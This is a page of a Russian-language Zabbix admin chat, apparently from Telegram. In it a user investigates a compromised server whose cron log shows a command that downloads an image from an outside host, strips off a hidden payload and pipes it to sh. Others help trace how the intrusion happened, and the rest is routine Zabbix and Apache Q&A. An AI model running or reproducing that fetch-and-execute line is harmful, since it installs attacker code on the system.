@ZabbixPro

Страница 868 из 1183
Evgeniy
30.05.2018
05:05:44
CROND[12789]: (zabbix) CMD (curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh )
Так, почему именно под пользователем zabbix

Может не всё так плохо

{jnz хотя почему 404

Там картинка

Google
Паша
30.05.2018
05:07:55
Выведи в файл, а не в шелл, посмотри

Evgeniy
30.05.2018
05:07:59


Паша
30.05.2018
05:08:02
Интересно теперь :)

Evgeniy
30.05.2018
05:08:23
Чуть позже, сейчас пойду поем

это та картинка

Request Method: GET Status Code: 404

дохлая

Ilya
30.05.2018
05:09:36
это та картинка
Я расстрою, но 404 - это ошибка, когда файл не найден

Evgeniy
30.05.2018
05:09:58
Я расстрою, но 404 - это ошибка, когда файл не найден
Что мешает сделать картинку с текстом 404

Неважно что на пикче

Важно что скажет сервер

Паша
30.05.2018
05:16:55
Можете подсказать что это?)
А так, ради интереса, подскажи права (chmod) на файлы конфигурации агента :)

Realmagnum Alex
30.05.2018
05:23:23
Вопрос. У меня заббикс Zabbix 3.4.1 в образе на виртуалке. Внутри нее убунта 14.04 с питоном Python 2.7.6 а поддержка sock5 прокси появилась в более поздних версиях. Посоветуйте как лучше провести обновление?

Google
Realmagnum Alex
30.05.2018
05:24:28
Убунта говорит python is already the newest version.

Aleks
30.05.2018
05:38:19
тыкать в python3

понять что такое pip и зачем оно

Evgeniy
30.05.2018
05:43:39
счас покажу

750 drwxr-x--- 2 apache apache 4096 May 24 06:41 web 644 -rw-r--r— 1 root root 10389 Oct 7 2016 zabbix_agentd.conf 644 -rw-r--r— 1 root root 10379 May 9 11:57 zabbix_agentd.conf.rpmnew 755 drwxr-xr-x 2 root root 4096 May 24 06:42 zabbix_agentd.d 640 -rw-r---— 1 root zabbix 14884 Sep 18 2017 zabbix_server.conf

Все не допру как они просочились

Продолжаю держать вкурсе:



В то время стоят старый zabbix

Началось все Mon Feb 27 15:00:05 2017

Danil
30.05.2018
06:18:07
не самый плохой вариант

Evgeniy
30.05.2018
06:18:50
не самый плохой вариант
Да понятно что меньшее зло, я не понимаю через что они добрались до shell

Danil
30.05.2018
06:20:12
доступ к вэбу в интернет открыт ? ... ps я не особо разбираюсь в технологиях защиты вэб контента , но на всякий случай дропаю всё iptables'ами и даю доступ только доверенным ипам

Danil
30.05.2018
06:22:24
брутфорс какойнибудь , ботнетом наверно не долго

Evgeniy
30.05.2018
06:22:48


zabbix❌995:993:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin

Danil
30.05.2018
06:24:14
наверно ограничего , если бы выжирали полностью ресурсы - ты бы сразу нашел , и выключил , а там может миллион серваков майнят , и владельцы не в курсе

Google
Evgeniy
30.05.2018
06:24:47
Zabbix не могли подбирать, он не входит в систему

Паша
30.05.2018
06:25:05
/var/log/secure погляди

Danil
30.05.2018
06:25:33
Брутфорс чего? Учетки ssh? zabbix ?
хз , я не знаю как это работает ) может какойнибудь webмежсайтовыйxsslиещёмногоНеПонятныхАбривиатур использовали

Evgeniy
30.05.2018
06:25:54
:D

Так, допустим было ОТВЕРСТИЕ в системе безопастности сайта, тогда они должны быть apache:apache

Но запущено от zabbix

SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.

?

/var/log/secure погляди
Слишком давние события, с февраля

Евгений
30.05.2018
06:37:40
Всем привет, кто помнит как перевести заббикс в вид http://ip:port

Evgeniy
30.05.2018
06:38:48
sshd[16922]: Received disconnect from 181.15.216.20 port 36348:11: Normal Shutdown, Thank you for playing [preauth] лол

Евгений
30.05.2018
06:38:49
на убунте

Evgeniy
30.05.2018
06:39:02
Повесить на другой порт хочешь или что

Евгений
30.05.2018
06:40:08
в смысле не http://ip/zabbix а http://ip:port

не - порт тот же. вебку хочу подправить

Evgeniy
30.05.2018
06:42:25
в смысле не http://ip/zabbix а http://ip:port
в смысле не http://ip/zabbix, а http://ip/ ?

Может про это?

Kolunchik
30.05.2018
06:42:43
а при чём тут заббикс? веб-сервер крутить надо

Evgeniy
30.05.2018
06:43:44
в смысле не http://ip/zabbix а http://ip:port
В том, что вы описали я вижу две задачи. Одна это избавится от папки

Google
Evgeniy
30.05.2018
06:44:05
чтоб можно было просто по ip заходить и сразу открывался zabbix

Паша
30.05.2018
06:44:40
Если это всё, что нужно, то в nginx'е можно просто rewrite сделать

Alexander
30.05.2018
06:45:22
Всем привет, кто помнит как перевести заббикс в вид http://ip:port
заставить отвечать веб-сервер на запросы при обращении к http://IP:Port

Паша
30.05.2018
06:46:24
достаточно правиьно указать root
А, ну у меня просто заббикс за балансировщиком стоит

И там proxy_pass

Evgeniy
30.05.2018
06:46:58
А если /etc/httpd/conf.d/zabbix.conf отредактировать

Alexander
30.05.2018
06:47:01
ну мы ж не знаем что там и как

Admin
ERROR: S client not available

Evgeniy
30.05.2018
06:47:11
Заменив Alias /zabbix /usr/share/zabbix на Alias / /usr/share/zabbix

Alexander
30.05.2018
06:47:14
описывать надо точно

Паша
30.05.2018
06:47:24
А вот про апач не подскажу, сорри

Alexander
30.05.2018
06:47:30
а вообще обращение по IP - дурной тон из 90-х

Евгений
30.05.2018
06:47:42
не не - там виртуалка для тестов и более ничего

Kolunchik
30.05.2018
06:48:03
может ребята на ipv6 перешли, там адреса норм запоминаются

Евгений
30.05.2018
06:48:06
и апач...

Evgeniy
30.05.2018
06:48:38
а вообще обращение по IP - дурной тон из 90-х
А мы с вами на брудершафт не пили, что бы на домен перейти

Михаил
30.05.2018
06:48:57
А мы с вами на брудершафт не пили, что бы на домен перейти
а потом окажется, что в продакшене где-нибудь застрял ip и ничего не пашет :)

Evgeniy
30.05.2018
06:48:58
:))

Google
Evgeniy
30.05.2018
06:50:02
ок
Это шутка была, а то ваш "ок" такой серьезный.

Alexander
30.05.2018
06:50:15
дык

в общем я всегда за то чтобы понять почему такая проблема а не как решить конкретное техническое что-то

Alexander
30.05.2018
06:50:58
зачастую изначально что-то с консерваторией и пытаются техническими средствами выправить

Евгений
30.05.2018
07:03:12
может ребята на ipv6 перешли, там адреса норм запоминаются
Шутки за сто ? ))) * А агентов кто как по компьютерам раскидывает?

Kolunchik
30.05.2018
07:04:54
У нас ansible, всё нормально.

Паша
30.05.2018
07:11:16
ansible

С блекджеком, метадатой и авторегистрацией ?

Евгений
30.05.2018
07:16:07
Заменив Alias /zabbix /usr/share/zabbix на Alias / /usr/share/zabbix
невзлетело - вэбка недоступна

Evgeniy
30.05.2018
07:21:44
невзлетело - вэбка недоступна
Счас тогда посмотрю как сам сделал

Roman
30.05.2018
07:30:37
snmp то поставил, а snmp-mibs-downloader не было в пакетах
в Debian он находится в non-free репозитории

Nikolay
30.05.2018
08:23:54
Друзья. помогите со скринами. Почему одним пользователям заббикс виден скрин, другим нет. Проблема, думаю в правах. Но в чём конкретно, не соображу. Подскажите, плиз

Nikita
30.05.2018
08:31:47
Nikolay
30.05.2018
08:32:38
Какие права нужны, чтобы ползователь мог видеть скрин? read достаточно?

Nikita
30.05.2018
08:32:46
да

и указываешь какой именно скрин

у меня просто заббикса под рукой нет чтоб подробно написать

Nikolay
30.05.2018
08:36:05
Извините, забыл сказать версию заббикс. В скринах 3 ветки, прям в настройках скрина есть права и они работаю, как нужно. У меня версия заббикс 2. Там нет в настройках прав

Dmitry
30.05.2018
08:39:52
Коллеги, есть ли хороший, годный шаблон для мониторинга дисков? Особенно интересует latency, i/o wait, скорость чтения\записи. Не повредят и данные SMART. Использую Zabbix 3.2

Страница 868 из 1183